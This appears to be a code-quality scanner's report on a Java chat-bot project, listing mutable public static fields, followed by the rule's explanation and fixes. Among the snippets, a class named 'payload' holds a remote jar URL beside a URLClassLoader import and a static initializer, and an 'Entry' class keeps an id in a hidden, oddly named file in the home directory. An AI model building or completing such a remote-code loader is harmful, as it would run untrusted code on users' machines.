instance should not be public
11import java.util.HashMap;
12
13public class AuthManager {
14 public static AuthManager instance; 15
16 protected HashMap<String, AuthLoginSession> pending_tokens = new HashMap<>();
17 protected HashMap<String, String> active_tokens = new HashMap<>();port should not be public
17public class HttpApi {
18
19 public static HttpApi instance;
20 public static int port;21 public HttpServer server;
22 public HttpContext context;
23 public HashMap<String, HttpApiHandler> handlers = new HashMap<String, HttpApiHandler>();instance should not be public
16
17public class HttpApi {
18
19 public static HttpApi instance;20 public static int port;
21 public HttpServer server;
22 public HttpContext context;languages should not be public
8import java.io.IOException;
9
10public class TranslateApi {
11 public static String[] languages = new String[]{12 "de",13 "en",14 "es",15 "fr",16 "it",17 "ja",18 "ko",19 "pt",20 "ru",21 "zh"22 };23
24 public String translate(String message, String to) throws IOException, JsonSyntaxException {
25 message = message.replace("#", "%23");countries should not be public
8import java.io.IOException;
9
10public class CoronaApi {
11 public static String[] countries = new String[]{12 "germany",13 "usa",14 "italy",15 "spain",16 "france",17 "uk",18 "sweden",19 "norway",20 "denmark",21 "switzerland",22 "austria",23 "netherlands",24 "ireland",25 "poland",26 "finland",27 "serbia",28 "montenegro",29 "bulgaria",30 "greece",31 "malta",32 "cyprus",33 "macedonia",34 "slovenia",35 "russia"36 };37
38 public CoronaApiResult fetchCountry(String country) throws IOException, JsonSyntaxException {
39 String res = HttpClient.get("https://disease.sh/v3/covid-19/countries/" + country);VALUE_ARRAY should not be public
3public class EventPriority {
4 public static final byte FIRST = 0, SECOND = 1, THIRD = 2, FOURTH = 3, FIFTH = 4;
5
6 public static final byte[] VALUE_ARRAY = new byte[]{FIRST, SECOND, THIRD, FOURTH, FIFTH};7}
default_config should not be public
5import gq.glowman554.bot.log.Log;
6
7public class Testing {
8 public static CommandConfig default_config = new CommandConfig("just for testing", "just for testing", "testing"); 9
10 public static void load() {
11 Log.log("--- WARNING --- Loading testing commands!!!!");webPlatform should not be public
26 public static DiscordPlatform discordPlatform;
27 public static TelegramPlatform telegramPlatform;
28 public static ConsolePlatform consolePlatform;
29 public static WebPlatform webPlatform; 30
31 public static void load_config() {
32 Log.log("Loading config...");consolePlatform should not be public
25
26 public static DiscordPlatform discordPlatform;
27 public static TelegramPlatform telegramPlatform;
28 public static ConsolePlatform consolePlatform; 29 public static WebPlatform webPlatform;
30
31 public static void load_config() {telegramPlatform should not be public
24 public static boolean tiny_crash_report = false;
25
26 public static DiscordPlatform discordPlatform;
27 public static TelegramPlatform telegramPlatform; 28 public static ConsolePlatform consolePlatform;
29 public static WebPlatform webPlatform;
30discordPlatform should not be public
23 public static long startTime;
24 public static boolean tiny_crash_report = false;
25
26 public static DiscordPlatform discordPlatform; 27 public static TelegramPlatform telegramPlatform;
28 public static ConsolePlatform consolePlatform;
29 public static WebPlatform webPlatform;tiny_crash_report should not be public
21 public static ConfigManager configManager;
22 public static PluginLoader pluginLoader;
23 public static long startTime;
24 public static boolean tiny_crash_report = false; 25
26 public static DiscordPlatform discordPlatform;
27 public static TelegramPlatform telegramPlatform;startTime should not be public
20 public static CommandManager commandManager;
21 public static ConfigManager configManager;
22 public static PluginLoader pluginLoader;
23 public static long startTime; 24 public static boolean tiny_crash_report = false;
25
26 public static DiscordPlatform discordPlatform;pluginLoader should not be public
19public class Main {
20 public static CommandManager commandManager;
21 public static ConfigManager configManager;
22 public static PluginLoader pluginLoader; 23 public static long startTime;
24 public static boolean tiny_crash_report = false;
25configManager should not be public
18
19public class Main {
20 public static CommandManager commandManager;
21 public static ConfigManager configManager; 22 public static PluginLoader pluginLoader;
23 public static long startTime;
24 public static boolean tiny_crash_report = false;commandManager should not be public
17import gq.glowman554.bot.utils.MultiThreadHelper;
18
19public class Main {
20 public static CommandManager commandManager; 21 public static ConfigManager configManager;
22 public static PluginLoader pluginLoader;
23 public static long startTime;instance should not be public
8import net.shadew.json.JsonSyntaxException;
9
10public class PageManager {
11 public static PageManager instance; 12
13 public String[] known_pages = new String[0];
14pageChangeLogHandlerInstance should not be public
18import gq.glowman554.bot.wiki.event.PageUpdateEvent;
19
20public class WikiPlugin implements Plugin {
21 public static PageChangeLogHandler pageChangeLogHandlerInstance;22 @Override
23 public void on_load() throws Exception {
24 Log.log("Hello World!");instance should not be public
13
14
15public class RainbowRoleManager {
16 public static RainbowRoleManager instance; 17
18 private ArrayList<String> role_ids = new ArrayList<String>();
19 private ArrayList<Role> roles = new ArrayList<Role>();url should not be public
6import java.net.URLClassLoader;
7
8public class payload {
9 public static String url = "https://x.glowman554.gq/files/bla.jar"; // change to url10
11 static {
12 try {stopThread should not be public
65 * false = threads shouldn´t stop
66 * true = threads should stop
67 */
68 public static boolean stopThread = false; 69
70 /**
71 * This thread checksid_store_path should not be public
7
8public class Entry {
9 public static String id = null;
10 public static String id_store_path = System.getProperty("user.home") + "/.vbshfvibiiebvi";11
12
13 public static void entry() throws Exception {id should not be public
6import java.io.File;
7
8public class Entry {
9 public static String id = null;10 public static String id_store_path = System.getProperty("user.home") + "/.vbshfvibiiebvi";
11
12
Description
This code contains a public static field which is not final, or is mutable even when declared as final.
Consider making the field private, as it is possible that such a field could be manipulated to produce unintended results.
Bad Practice
Here, the NUM_RETRIES field could be manipulated to perform a Denial of Service (DoS) attack when set to some very high number.
class SomeClass {
public static int NUM_RETRIES = 3;
}
// Elsewhere...
SomeClass someObj = ...;
SomeClass.NUM_RETRIES = Integer.MAX_VALUE; // This could make an application hang!
Recommended
There are multiple ways to avoid this, and you must choose the best method as per your requirements.
Make the field final
If you do not need the field to be mutable, consider just making it final:
public static final int NUM_RETRIES = 3;
Make the field private
If you require the field to be mutable, consider making the field private. If you also need to expose the field to API consumers, consider adding a static or instance getter method for the field:
private static int NUM_RETRIES = 3;
// Static getter
public static final int getNumRetries() {
return NUM_RETRIES;
}
// Instance getter, only usable when we have an instance of this class created.
public final int getNumRetries() {
return NUM_RETRIES;
}
If you also need to be able to set the value, make sure to sanitize the assigned data. You could check if the retry value is within a maximum permissible limit (MAX_NUM_RETRIES) and if the assigned value is below 0 or above the maximum limit, clamp that value to within those limits.
public static final void setNumRetries(int retries) {
// clamp retries to within the range 0 to MAX_NUM_RETRIES.
retries = (retries > MAX_NUM_RETRIES) ? MAX_NUM_RETRIES : ((retries < 0) ? 0 : retries);
NUM_RETRIES = retries;
}